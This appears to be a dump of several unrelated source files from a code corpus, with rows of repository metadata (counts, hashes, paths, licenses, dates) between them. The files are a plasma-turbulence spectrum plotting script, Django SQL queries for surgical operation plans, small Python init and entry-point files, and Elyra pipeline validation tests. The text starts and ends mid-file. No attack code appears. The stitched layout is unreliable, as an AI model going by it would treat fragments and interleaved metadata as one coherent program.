ntrans_upe_upe_g_bin = sum_negative_kz2d(ntrans_upe_upe_g_bin)
ntrans_bpe_upe_g_bin = sum_negative_kz2d(ntrans_bpe_upe_g_bin)
ntrans_bpe_bpe_g_bin = sum_negative_kz2d(ntrans_bpe_bpe_g_bin)
ntrans_upe_bpe_g_bin = sum_negative_kz2d(ntrans_upe_bpe_g_bin)
ntrans_upa_upa_g_bin = sum_negative_kz2d(ntrans_upa_upa_g_bin)
ntrans_bpa_upa_g_bin = sum_negative_kz2d(ntrans_bpa_upa_g_bin)
ntrans_bpa_bpa_g_bin = sum_negative_kz2d(ntrans_bpa_bpa_g_bin)
ntrans_upa_bpa_g_bin = sum_negative_kz2d(ntrans_upa_bpa_g_bin)
ntrans_aw_l_bin = ntrans_upe_upe_l_bin + ntrans_bpe_upe_l_bin + ntrans_bpe_bpe_l_bin + ntrans_upe_bpe_l_bin
ntrans_aw_g_bin = ntrans_upe_upe_g_bin + ntrans_bpe_upe_g_bin + ntrans_bpe_bpe_g_bin + ntrans_upe_bpe_g_bin
ntrans_compr_l_bin = ntrans_upa_upa_l_bin + ntrans_bpa_upa_l_bin + ntrans_bpa_bpa_l_bin + ntrans_upa_bpa_l_bin
ntrans_compr_g_bin = ntrans_upa_upa_g_bin + ntrans_bpa_upa_g_bin + ntrans_bpa_bpa_g_bin + ntrans_upa_bpa_g_bin
if nlz == nkz:
kp_end = np.argmin(np.abs(kpbin - kpbin.max()*2./3.))
if not is2D:
kz_end = np.argmin(np.abs(kz[1:int(nkz/2)] - kz[1:int(nkz/2)].max()*2./3.))
else:
kp_end = kpbin.size - 1
kz_end = int(nkz/2)
#--------------------------------------------------------#
# plot 1D spectra #
#--------------------------------------------------------#
# kprp spectrum
ys = [
np.sum(upe2_bin[final_idx, :, 1:kp_end], axis=0),
np.sum(bpe2_bin[final_idx, :, 1:kp_end], axis=0),
np.sum(upa2_bin[final_idx, :, 1:kp_end], axis=0),
np.sum(bpa2_bin[final_idx, :, 1:kp_end], axis=0),
kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(bpe2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
]
ls = [
'',
'',
'',
'',
'k--',
]
legends = [
r'$E_{u_\+}$',
r'$E_{\delta B_\+}$',
r'$E_{u_\|}$',
r'$E_{\delta B_\|}$',
r'-5/3',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra.pdf')
# kprp spectrum by components
ys = [
np.sum(upe2_bin[final_idx, :, 1:kp_end], axis=0),
np.sum(ux2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(uy2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(bpe2_bin[final_idx, :, 1:kp_end], axis=0),
np.sum(bx2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(by2_bin [final_idx, :, 1:kp_end], axis=0),
kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(bpe2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end]
]
ls = [
'r-',
'r--',
'r:',
'b-',
'b--',
'b:',
'k--',
]
legends = [
r'$E_{u_\+}$',
r'$E_{u_x}$',
r'$E_{u_y}$',
r'$E_{\delta B_\+}$',
r'$E_{\delta B_x}$',
r'$E_{\delta B_y}$',
r'-5/3',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_components.pdf')
# kprp spectrum by MRI injection rate and nonlinear transfer rate
ys = [
np.sum(p_aw_bin [final_idx,:,1:kp_end], axis=0),
np.sum(p_compr_bin [final_idx,:,1:kp_end], axis=0),
-np.sum(dissip_aw_bin [final_idx,:,1:kp_end], axis=0),
-np.sum(dissip_compr_bin [final_idx,:,1:kp_end], axis=0),
np.sum(ntrans_aw_l_bin [final_idx,:,1:kp_end], axis=0),
np.sum(ntrans_aw_g_bin [final_idx,:,1:kp_end], axis=0),
np.sum(ntrans_compr_l_bin[final_idx,:,1:kp_end], axis=0),
np.sum(ntrans_compr_g_bin[final_idx,:,1:kp_end], axis=0),
]
xs = [
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end]
]
ls = [
'',
'',
'',
'',
'',
'',
'',
'',
]
legends = [
r'$I_\mr{AW}$',
r'$I_\mr{compr}$',
r'$-\calD_\mr{AW}$',
r'$-\calD_\mr{compr}$',
r'$\calN_\mr{AW}^{<k_\+}$',
r'$\calN_\mr{AW}^{>k_\+}$',
r'$\calN_\mr{compr}^{<k_\+}$',
r'$\calN_\mr{compr}^{>k_\+}$',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_flux.pdf')
# Elsasser fields
ys = [
np.sum(zpep2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(zpem2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(zpap2_bin [final_idx, :, 1:kp_end], axis=0),
np.sum(zpam2_bin [final_idx, :, 1:kp_end], axis=0),
kpbin[1:kp_end]**(-5./3.)/kpbin[1]**(-5./3.)*np.sum(zpep2_bin[final_idx,:,1:kp_end], axis=0)[0],
kpbin[1:kp_end]**(-3./2.)/kpbin[1]**(-3./2.)*np.sum(zpep2_bin[final_idx,:,1:kp_end], axis=0)[0]
]
xs = [
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end],
kpbin[1:kp_end]
]
ls = [
'',
'',
'',
'',
'k--',
'k--',
]
legends = [
r'$E_{Z^+_\+}$',
r'$E_{Z^-_\+}$',
r'$E_{Z^+_\|}$',
r'$E_{Z^-_\|}$',
r'-5/3',
r'-3/2',
]
plot_log1d_many(xs, ys, xlab='$k_\+ L_\+$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kprp_spectra_ELS.pdf')
# kz spectrum
if not is2D:
ys = [
np.sum(upe2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(bpe2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(upa2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(bpa2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
]
xs = [
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
]
ls = [
'',
'',
'',
'',
]
legends = [
r'$E_{u_\+}$',
r'$E_{\delta B_\+}$',
r'$E_{u_\|}$',
r'$E_{\delta B_\|}$',
]
plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra.pdf')
# Elsasser fields
ys = [
np.sum(zpep2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(zpem2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(zpap2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
np.sum(zpam2_bin[final_idx, 1:kz_end, :kp_end], axis=1),
]
xs = [
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
]
ls = [
'',
'',
'',
'',
]
legends = [
r'$E_{Z^+_\+}$',
r'$E_{Z^-_\+}$',
r'$E_{Z^+_\|}$',
r'$E_{Z^-_\|}$',
]
plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra_ELS.pdf')
# MRI injection rate and nonlinear transfer rate
ys = [
np.sum(p_aw_bin [final_idx,1:kz_end,:kp_end], axis=1),
np.sum(p_compr_bin [final_idx,1:kz_end,:kp_end], axis=1),
-np.sum(dissip_aw_bin [final_idx,1:kz_end,:kp_end], axis=1),
-np.sum(dissip_compr_bin [final_idx,1:kz_end,:kp_end], axis=1),
np.sum(ntrans_aw_l_bin [final_idx,1:kz_end,:kp_end], axis=1),
np.sum(ntrans_aw_g_bin [final_idx,1:kz_end,:kp_end], axis=1),
np.sum(ntrans_compr_l_bin[final_idx,1:kz_end,:kp_end], axis=1),
np.sum(ntrans_compr_g_bin[final_idx,1:kz_end,:kp_end], axis=1),
]
xs = [
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
kz[1:kz_end],
]
ls = [
'',
'',
'',
'',
'',
'',
'',
'',
]
legends = [
r'$I_\mr{AW}$',
r'$I_\mr{compr}$',
r'$-\calD_\mr{AW}$',
r'$-\calD_\mr{compr}$',
r'$\calN_\mr{AW}^{<k_\+}$',
r'$\calN_\mr{AW}^{>k_\+}$',
r'$\calN_\mr{compr}^{<k_\+}$',
r'$\calN_\mr{compr}^{>k_\+}$',
]
plot_log1d_many(xs, ys, xlab='$'+kzlab+'$', legends=legends, ls=ls, legendloc='lower left', title=r'$t = %.2E $' % tt[final_idx], ylab='', term=True, save=outdir+'kz_spectra_flux.pdf')
#--------------------------------------------------------#
# plot 2D spectra #
#--------------------------------------------------------#
if not is2D:
plot_log2d(upe2_bin[final_idx, 1:kz_end, 1:kp_end], kpbin[1:kp_end], kz[1:kz_end], xlab='$k_\+ L_\+$', ylab='$'+kzlab+'$',
title=r'$E_{u_{\+}}$' + ' $(t = $ %.2E' % tt[final_idx] + '$)$', save=outdir + 'upe2.pdf')
plot_log2d(bpe2_bin[final_idx, 1:kz_end, 1:kp_end], kpbin[1:kp_end], kz[1:kz_end], xlab='$k_\+ L_\+$', ylab='$'+kzlab+'$',
title=r'$E_{\delta B_\+}$' + ' $(t = $ %.2E' % tt[final_idx] + '$)$', save=outdir + 'bpe2.pdf')
#------------------#
# output ascii #
#------------------#
np.savetxt(outdir + 'Ekprp.txt' , np.column_stack((kpbin[:kp_end],
np.sum(upe2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(bpe2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(upa2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(bpa2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(ux2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(uy2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(bx2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(by2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(zpep2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(zpem2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(zpap2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(zpam2_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(p_aw_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(p_compr_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(dissip_aw_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(dissip_compr_bin [final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_bpa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
np.sum(ntrans_upa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=0),
)), fmt='%E')
if not is2D:
np.savetxt(outdir + 'Ekz.txt' , np.column_stack((kz[:kz_end],
np.sum(upe2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(bpe2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(upa2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(bpa2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(ux2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(uy2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(bx2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(by2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(zpep2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(zpem2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(zpap2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(zpam2_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(p_aw_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(p_compr_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(dissip_aw_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(dissip_compr_bin [final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpe_upe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upe_bpe_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpa_upa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upa_bpa_l_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpe_upe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upe_bpe_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpa_upa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_bpa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
np.sum(ntrans_upa_bpa_g_bin[final_idx,:kz_end,:kp_end], axis=1),
)), fmt='%E')
del upe2_bin
del bpe2_bin
del upa2_bin
del bpa2_bin
| 49.676923
| 192
| 0.470063
| 2,664
| 19,374
| 3.033408
| 0.047673
| 0.088479
| 0.147012
| 0.098998
| 0.882812
| 0.862022
| 0.854721
| 0.803118
| 0.801757
| 0.798911
| 0
| 0.031199
| 0.366367
| 19,374
| 389
| 193
| 49.804627
| 0.627077
| 0.031382
| 0
| 0.432961
| 0
| 0
| 0.060409
| 0.013021
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00838
| 0
| 0.00838
| 0.002793
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0bb1961cf283c490645b9723db267a2de4f7f348
| 76
|
py
|
Python
|
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | 2
|
2019-03-02T22:18:18.000Z
|
2020-05-14T21:21:35.000Z
|
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | null | null | null |
app/controllers/__init__.py
|
ZehLuckmann/integracao
|
030f5f696367857b9a47dfec703f2a1b3021a26e
|
[
"MIT"
] | null | null | null |
# app/controllers/__init__.py
# coding:utf-8
from app.controllers import *
| 15.2
| 29
| 0.763158
| 11
| 76
| 4.909091
| 0.818182
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 0.118421
| 76
| 4
| 30
| 19
| 0.791045
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f045454c44f5748f54fb9edeb8683d33773ca946
| 71
|
py
|
Python
|
ONet/defense/__init__.py
|
code-roamer/IF-Defense
|
4e2462b66fa1eac90cfbf61fa0dc635d223fdf2f
|
[
"MIT"
] | 36
|
2020-10-07T05:52:15.000Z
|
2022-03-11T03:05:32.000Z
|
ONet/defense/__init__.py
|
code-roamer/IF-Defense
|
4e2462b66fa1eac90cfbf61fa0dc635d223fdf2f
|
[
"MIT"
] | 9
|
2021-01-04T02:11:36.000Z
|
2021-11-23T16:21:59.000Z
|
ONet/defense/__init__.py
|
Wuziyi616/IF-Defense
|
4b1d69d03d76e8d5ca1b4d45f81a8c9c60791263
|
[
"MIT"
] | 6
|
2020-11-29T02:13:55.000Z
|
2021-12-06T08:19:16.000Z
|
from .SOR import SORDefense
from .repulsion_loss import repulsion_loss
| 23.666667
| 42
| 0.859155
| 10
| 71
| 5.9
| 0.6
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 43
| 35.5
| 0.936508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f054a6e6d6cde64fa78480f407f69b16ed6b70b3
| 5,135
|
py
|
Python
|
api/plans/sql_func.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 10
|
2018-03-14T06:17:06.000Z
|
2022-03-10T05:33:34.000Z
|
api/plans/sql_func.py
|
hlebuschek/l2
|
2f25cf69b990121c3109fb7bbff04c09ca284694
|
[
"MIT"
] | 512
|
2018-09-10T07:37:34.000Z
|
2022-03-30T02:23:43.000Z
|
api/plans/sql_func.py
|
D00dleman/l2
|
0870144537ee340cd8db053a608d731e186f02fb
|
[
"MIT"
] | 24
|
2018-07-31T05:52:12.000Z
|
2022-02-08T00:39:41.000Z
|
from django.db import connection
from laboratory.settings import TIME_ZONE
def get_plans_by_params_sql(d_s, d_e, doc_operate_id, doc_anesthetist_id, department):
"""
парам: d_s - date-start, d_e - date-end, doc_operate, doc_anesthetist, deparment
:return:
"""
with connection.cursor() as cursor:
cursor.execute(
"""WITH
t_plans AS
(SELECT id as pk_plan, patient_card_id, direction,
to_char(date AT TIME ZONE %(tz)s, 'DD.MM.YYYY') AS date_char,
type_operation, doc_operate_id, doc_anesthetist_id, canceled, date FROM plans_planoperations
WHERE
CASE when %(doc_operate_id)s > -1 THEN
doc_operate_id = %(doc_operate_id)s AND date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
when %(doc_anesthetist_id)s > -1 THEN
doc_anesthetist_id = %(doc_anesthetist_id)s AND date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
when %(department_id)s > -1 THEN
date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s AND doc_operate_id in (SELECT id FROM users_doctorprofile where podrazdeleniye_id=%(department_id)s)
ELSE date AT TIME ZONE %(tz)s BETWEEN %(d_start)s AND %(d_end)s
END
ORDER BY date),
t_patient AS
(SELECT clients_card.id as card_id, clients_card.individual_id, clients_individual.family as ind_family,
clients_individual.name AS ind_name, clients_individual.patronymic as ind_twoname, to_char(clients_individual.birthday, 'DD.MM.YYYY') as birthday
FROM clients_individual
LEFT JOIN clients_card ON clients_individual.id = clients_card.individual_id
WHERE clients_card.id in (SELECT patient_card_id FROM t_plans))
SELECT pk_plan, patient_card_id, direction, date_char, type_operation, doc_operate_id, doc_anesthetist_id, canceled,
ind_family, ind_name, ind_twoname, birthday, date FROM t_plans
LEFT JOIN t_patient ON t_plans.patient_card_id = t_patient.card_id ORDER BY date
""",
params={'d_start': d_s, 'd_end': d_e, 'tz': TIME_ZONE, 'doc_operate_id': doc_operate_id, 'doc_anesthetist_id': doc_anesthetist_id, 'department_id': department},
)
row = cursor.fetchall()
return row
def get_plans_by_pk(pks_plan):
"""
парам: d_s - date-start, d_e - date-end, doc_operate, doc_anesthetist, deparment
:return:
"""
with connection.cursor() as cursor:
cursor.execute(
"""WITH
t_plans AS
(SELECT id as pk_plan,
patient_card_id,
direction,
to_char(date AT TIME ZONE %(tz)s, 'DD.MM.YYYY') AS date_char,
type_operation,
doc_operate_id,
doc_anesthetist_id,
canceled,
date
FROM plans_planoperations
WHERE id = ANY(ARRAY[%(pks_plan)s])
ORDER BY date),
t_patient AS
(SELECT clients_card.id as card_id, clients_card.individual_id, clients_individual.family as ind_family,
clients_individual.name AS ind_name, clients_individual.patronymic as ind_twoname, to_char(clients_individual.birthday, 'DD.MM.YYYY') as birthday
FROM clients_individual
LEFT JOIN clients_card ON clients_individual.id = clients_card.individual_id
WHERE clients_card.id in (SELECT patient_card_id FROM t_plans)),
t_podrazdeleniye AS (
SELECT id as id, title as title_podr, short_title FROM podrazdeleniya_podrazdeleniya),
t_users_doc AS (
SELECT users_doctorprofile.id as doc_id, user_id, podrazdeleniye_id, fio, t_podrazdeleniye.title_podr as podr_title,
t_podrazdeleniye.short_title as short_podr_title
FROM users_doctorprofile
LEFT JOIN t_podrazdeleniye ON users_doctorprofile.podrazdeleniye_id = t_podrazdeleniye.id
),
t_users_anesthetist AS (
SELECT users_doctorprofile.id as doc_id, user_id, podrazdeleniye_id, fio, t_podrazdeleniye.title_podr as podr_title,
t_podrazdeleniye.short_title as short_podr_title
FROM users_doctorprofile
LEFT JOIN t_podrazdeleniye ON users_doctorprofile.podrazdeleniye_id = t_podrazdeleniye.id
)
SELECT pk_plan, patient_card_id, direction, date_char, type_operation, doc_operate_id, t_users_doc.fio, t_users_doc.short_podr_title,
doc_anesthetist_id, t_users_anesthetist.fio, canceled, ind_family, ind_name, ind_twoname, birthday, date, t_users_doc.podr_title FROM t_plans
LEFT JOIN t_patient ON t_plans.patient_card_id = t_patient.card_id
LEFT JOIN t_users_doc ON t_users_doc.doc_id = t_plans.doc_operate_id
LEFT JOIN t_users_anesthetist ON t_users_anesthetist.doc_id = t_plans.doc_anesthetist_id
ORDER BY date
""",
params={'pks_plan': pks_plan, 'tz': TIME_ZONE},
)
row = cursor.fetchall()
return row
| 47.990654
| 172
| 0.666796
| 718
| 5,135
| 4.43454
| 0.119777
| 0.030151
| 0.045226
| 0.032977
| 0.81407
| 0.75691
| 0.714196
| 0.714196
| 0.714196
| 0.687814
| 0
| 0.000792
| 0.262317
| 5,135
| 106
| 173
| 48.443396
| 0.839757
| 0.035248
| 0
| 0.444444
| 0
| 0
| 0.09691
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f08474e5767b8c9877afcf8e3e1fd60d0d3a21c2
| 221
|
py
|
Python
|
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
gangue.py
|
Shardj/py-gangue
|
d02e4e0b0c85069cb4ca9c507be77ecaac51dd73
|
[
"MIT"
] | null | null | null |
# Entry point
import pyfiglet
from app.configs.local import projectName
print(pyfiglet.figlet_format(projectName, font = "slant"))
import core.packages.router.route_manager as route_manager
route_manager.RouteManger()
| 22.1
| 58
| 0.823529
| 29
| 221
| 6.137931
| 0.724138
| 0.202247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095023
| 221
| 9
| 59
| 24.555556
| 0.89
| 0.049774
| 0
| 0
| 0
| 0
| 0.024038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0.2
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f0849556e0a13e8caa72be8225fd3bc0fe323167
| 29,633
|
py
|
Python
|
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | 1
|
2022-02-18T14:21:33.000Z
|
2022-02-18T14:21:33.000Z
|
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | null | null | null |
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018-2022 Elyra Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from conftest import AIRFLOW_COMPONENT_CACHE_INSTANCE
from conftest import KFP_COMPONENT_CACHE_INSTANCE
import pytest
from elyra.pipeline.pipeline import PIPELINE_CURRENT_VERSION
from elyra.pipeline.pipeline_definition import PipelineDefinition
from elyra.pipeline.validation import PipelineValidationManager
from elyra.pipeline.validation import ValidationResponse
from elyra.tests.pipeline.util import _read_pipeline_resource
@pytest.fixture
def load_pipeline():
def _function(pipeline_filepath):
response = ValidationResponse()
pipeline = _read_pipeline_resource(f'resources/validation_pipelines/{pipeline_filepath}')
return pipeline, response
yield _function
@pytest.fixture
def validation_manager(setup_factory_data):
root = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__), "resources/validation_pipelines"))
yield PipelineValidationManager.instance(root_dir=root)
PipelineValidationManager.clear_instance()
async def test_invalid_lower_pipeline_version(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
pipeline_version = PIPELINE_CURRENT_VERSION - 1
pipeline['pipelines'][0]['app_data']['version'] = pipeline_version
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidPipeline'
assert issues[0]['message'] == f'Pipeline version {pipeline_version} is out of date '\
'and needs to be migrated using the Elyra pipeline editor.'
def test_invalid_upper_pipeline_version(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
pipeline_version = PIPELINE_CURRENT_VERSION + 1
pipeline['pipelines'][0]['app_data']['version'] = pipeline_version
